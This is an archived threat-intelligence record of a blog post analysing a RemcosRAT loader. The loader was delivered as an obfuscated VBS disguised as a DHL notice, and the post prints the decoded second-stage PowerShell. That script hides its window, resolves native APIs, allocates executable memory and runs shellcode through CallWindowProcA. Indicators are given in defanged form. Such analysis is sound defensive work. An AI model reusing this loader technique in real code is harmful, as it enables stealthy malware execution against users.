{
	"id": "42410b8b-445c-43f5-a007-a6fdbef05016",
	"created_at": "2026-04-06T00:06:14.493372Z",
	"updated_at": "2026-04-10T03:21:53.411422Z",
	"deleted_at": null,
	"sha1_hash": "ee04a56a3397bdaa9dd5ca1db88382427d598353",
	"title": "Malware Analysis - RemcosRAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1720747,
	"plain_text": "Malware Analysis - RemcosRAT\r\nBy Bar Magnezi\r\nPublished: 2024-05-30 · Archived: 2026-04-05 13:03:51 UTC\r\n4 minute read\r\nSample:\r\n5a4ef048a5e3b38a1cfe3813955c1770\r\nBackgroundPermalink\r\nRemcos RAT (Remote Control and Surveillance) is a malware tool used for remote control of infected computers,\r\ntypically distributed via phishing emails, malicious attachments, or compromised websites. It allows attackers to\r\ncapture keystrokes, take screenshots, record audio, steal passwords, manage files and manipulate processes and\r\nservices.\r\nStatic AnalysisPermalink\r\nFigure 1: Malware Bazaar Entry\r\nhttps://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/\r\nPage 1 of 9\n\nThis sample was uploaded to Malware Bazaar, impersonating a DHL delivery notification.\r\nFigure 2: Obfuscated VBS\r\nFigure 3: Second part of the VBS\r\nWe can already see strings related to PowerShell, as marked in Figures 2 and 3. I decided to clean the code a bit to\r\nmake it more readable.\r\nhttps://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/\r\nPage 2 of 9\n\nFigure 4: Cleaned VBS\r\nAs marked in Figure 4, this function is being called on almost every variable. Basically, what this function does is\r\ntake a large string and extract every 5th character to build a new string.\r\nFigure 5: Building Regex in CyberChef\r\nAfter iterating over every variable and decoding it, we got the following output:\r\nhttps://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/\r\nPage 3 of 9\n\nFigure 6: Deobfuscated VBS\r\nAs marked in Figure 6, we can see a URL and a specific byte location from which it reads and performs further\r\nmanipulation.\r\nSecond StagePermalink\r\nIn order to obtain the second stage of the malware, I needed to browse to this URL, which output a large string.\r\nFigure 7: Seeing The content of the URL\r\nI used CyberChef to base64-decode this file and went to the specific location marked in Figure 6. 
This revealed the actual second-stage payload.\r\nFigure 8: Base64-decode\r\nCopying the entire decoded content to a new file showed that it reuses the same every-5th-character trick (the same regex as before) and adds a second encoding method.\r\nFigure 9: Using the Same Regex\r\nFigure 10: Using new encoding method\r\nAfter further analysis, I found that this second encoding method is hex text in which every byte is XORed with the key 0x17 (23 decimal), as shown in Figure 11. The decoded strings are the API names and PowerShell fragments the loader needs.\r\nFigure 11: Using CyberChef to decode\r\nFigure 12: Decoding of every XOR encoded string\r\nSecond-Stage PowerShell After Decoding \u0026 Cleaning\r\n# Smedemestres evaluates a string as PowerShell (it behaves like Invoke-Expression); Irvings27 '...' 1 does the same after decoding.\r\n# Stage 1: when running as a 64-bit process, re-spawn under the 32-bit PowerShell in SysWOW64 with the original argument, then exit.\r\n$Woadman='\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe '\r\n$Hogg='powershell.exe '\r\n$Skamfilendes ='exit '\r\nSmedemestres ('$global:Recants=$env:windir + $Woadman ')\r\nSmedemestres ('$global:Desinficeringsmidlerne = ((gwmi win32_process -F ProcessId=${PID}).CommandLine) -split [c\r\nSmedemestres ('$global:gammoned = $Desinficeringsmidlerne[$Desinficeringsmidlerne.count-2] ')\r\nSmedemestres ('$global:Forbigangen = ([IntPtr]::size -eq 8) ')\r\nSmedemestres ('if (!$Forbigangen){ $global:Recants = $Hogg} ')\r\nSmedemestres ('$global:Turboladedes=($Understimuleret -or $Forbigangen) ')\r\nif($Turboladedes){\r\n\u0026$Recants $gammoned\r\nSmedemestres $Skamfilendes\r\n}\r\n# XOR helper used by the string decoder\r\nfunction Skinproblemer136 ($Gutsily,$Mdeaftalerne) {\r\nSmedemestres ('$Gutsily -bxor $Mdeaftalerne ')\r\n}\r\n# String decoder: hex pairs -> bytes, each byte XORed with 23 (0x17), then read as ASCII; with the second argument set, the result is executed instead of returned.\r\nFunction Irvings27 ($vagtposten, $Herpetolog = 0){\r\nSmedemestres ('$global:Blomsterkoste = New-Object byte[] ($vagtposten.Length / 2) $global:Blomsterkoste = New-Ob\r\nFor($Milvine=0; $Milvine -lt $vagtposten.Length; $Milvine+=2){\r\nSmedemestres ('$Blomsterkoste[$Milvine/2] = [convert]::ToByte($vagtposten.Substring($Milvine, 2), 16) ')\r\n$Blomsterkoste[$Milvine/2] = Skinproblemer136 $Blomsterkoste[$Milvine/2] 23\r\n}\r\nSmedemestres ('$global:Pigeonholes=[String][System.Text.Encoding]::ASCII.GetString($Blomsterkoste) ')\r\nif ($Herpetolog) {\r\nSmedemestres $Pigeonholes\r\n}else {\r\n$Pigeonholes\r\n}\r\n}\r\n# Decoded string table (hex literals shown already decoded): the assembly, type, flag and API names used below\r\n$Revisionen=Irvings27 'System.dll'\r\n$Miniatureformaters=Irvings27 'Microsoft.Win32.UnsafeNativeMethods'\r\n$Ekskursionens=Irvings27 'GetProcAddress'\r\n$Masterstroke=Irvings27 'System.Runtime.InteropServices.HandleRef'\r\n$Nationalistiske=Irvings27 'string'\r\n$Waling89=Irvings27 'GetModuleHandle'\r\n$Lige=Irvings27 'RTSpecialName, HideBySig, Public'\r\n$Coelanaglyphic=Irvings27 'Runtime, Managed'\r\n$Zorn=Irvings27 'ReflectedDelegate'\r\n$Fljtespillernes=Irvings27 'InMemoryModule'\r\n$requital=Irvings27 'MyDelegateType'\r\n$Mancipate=Irvings27 'Class, Public, Sealed, AnsiClass, AutoClass'\r\n$Paritetsbit=Irvings27 'Invoke'\r\n$Intenible=Irvings27 'Public, HideBySig, NewSlot, Virtual'\r\n$Lanolated=Irvings27 'VirtualAlloc'\r\n$Konfererende=Irvings27 'ntdll'\r\n$Premeasure=Irvings27 'NtProtectVirtualMemory'\r\n$Postantennal=Irvings27 '\\'\r\n$Squalidness=Irvings27 'USER32'\r\n$Froprdiken=Irvings27 'CallWindowProcA'\r\n$dermatopathophobia = Irvings27 'kernel32'\r\n$Gaveafgifters = Irvings27 'user32'\r\n$Muschelkalk=Irvings27 'ShowWindow'\r\n# Resolve an export address: GetProcAddress(GetModuleHandle(module), name), reached through the internal Microsoft.Win32.UnsafeNativeMethods class of System.dll\r\nfunction Platinamine ($Ravishments, $Byrindets)\r\n{\r\nIrvings27 '$global:Datareduktionsfordelens = [AppDomain]::CurrentDomain.GetAssemblies()' 1\r\nIrvings27 '$global:Forpagtningsforhold = ($Datareduktionsfordelens | Where-Object { $_.GlobalAssemblyCa\r\nIrvings27 '$global:Firesafe = $Forpagtningsforhold.GetMethod($Ekskursionens, [Type[]] @($Masterstroke,\r\nIrvings27 'return $Firesafe.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object Syste\r\n}\r\n# Build a delegate type at runtime with Reflection.Emit so a raw function pointer can be invoked\r\nfunction Taenkte ([Parameter(Position = 0)] [Type[]] $Nominations,[Parameter(Position = 1)] [Type] $Baggrundslag\r\n{\r\nIrvings27 '$global:Bagvasker = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Refl\r\n$Nuklearmedicin85=33344-33343\r\nIrvings27 '$Bagvasker.DefineConstructor($Lige, $Nuklearmedicin85, $Nominations).SetImplementationFlags(\r\nIrvings27 '$Bagvasker.DefineMethod($Paritetsbit, $Intenible, $Baggrundslager, $Nominations).SetImplemen\r\nIrvings27 'return $Bagvasker.CreateType()' 1\r\n}\r\n# By their call signatures below, $Headroom wraps VirtualAlloc (4 arguments) and $Rhema wraps ShowWindow (2 arguments)\r\n$Indvendendes=0\r\nIrvings27 '$global:Headroom = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((Platinami\r\nIrvings27 '$global:Rhema = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((Platinamine\r\n# Hide the console: set a unique window title, find our own window by it, then ShowWindow(hwnd, 0 = SW_HIDE)\r\n$Holloa = 'Varigheder'\r\nIrvings27 '${Host}.UI.RawUI.WindowTitle = $Holloa' 1\r\nIrvings27 '$global:Niches = (Get-Process | Where-Object { $_.MainWindowTitle -eq $Holloa })' 1\r\nIrvings27 '$global:Backsliding = $Niches.MainWindowHandle' 1\r\nIrvings27 '$Rhema.Invoke($Backsliding, $Indvendendes)' 1\r\n# Resolve ntdll!NtProtectVirtualMemory, then allocate two regions: 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE, 0x4 = PAGE_READWRITE\r\n$Nonmethodically = Platinamine $Konfererende $Premeasure\r\n$GutsilyllocType=-13794+26082\r\n$GutsilyllocProt=-50897+50961\r\n$Gutsilyllocrw=-28683+28687\r\nIrvings27 '$global:Resultaterne = $Headroom.Invoke($Indvendendes, 655, $GutsilyllocType, $GutsilyllocProt)' 1\r\nIrvings27 '$global:Arbejdsbyrder = $Headroom.Invoke($Indvendendes, 26640384, $GutsilyllocType, $Gutsilyllocrw)'\r\n# Split the payload buffer $Okkuperingers (defined outside this listing, at least 284535 bytes): the first 655 bytes go into the RWX region, the remaining 283880 into the large RW region\r\nIrvings27 '[System.Runtime.InteropServices.Marshal]::Copy($Okkuperingers, $Indvendendes, $Resultaterne, 655)' 1\r\n$Divergence=284535-655\r\nIrvings27 '[System.Runtime.InteropServices.Marshal]::Copy($Okkuperingers, 655, $Arbejdsbyrder, $Divergence)' 1\r\n# $Erobringstogt is the 5-argument CallWindowProcA: the 655-byte stub runs as the window procedure, with the RW buffer and the NtProtectVirtualMemory address passed in as its parameters\r\nIrvings27 '$global:Erobringstogt = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((Plat\r\nIrvings27 '$Erobringstogt.Invoke($Resultaterne,$Arbejdsbyrder,$Nonmethodically,$Indvendendes,$Indvendendes)' 1\r\nIOCs\r\nHash (MD5): 5a4ef048a5e3b38a1cfe3813955c1770\r\nDomain: shereihnao[.]ru[.]com\r\nURL: hxxp://shereihnao[.]ru[.]com/Bededagsferier[.]hhk\r\nSource: https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/"
	],
	"report_names": [
		"RemcosRAT"
	],
	"threat_actors": [],
	"ts_created_at": 1775433974,
	"ts_updated_at": 1775791313,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ee04a56a3397bdaa9dd5ca1db88382427d598353.pdf",
		"text": "https://archive.orkl.eu/ee04a56a3397bdaa9dd5ca1db88382427d598353.txt",
		"img": "https://archive.orkl.eu/ee04a56a3397bdaa9dd5ca1db88382427d598353.jpg"
	}
}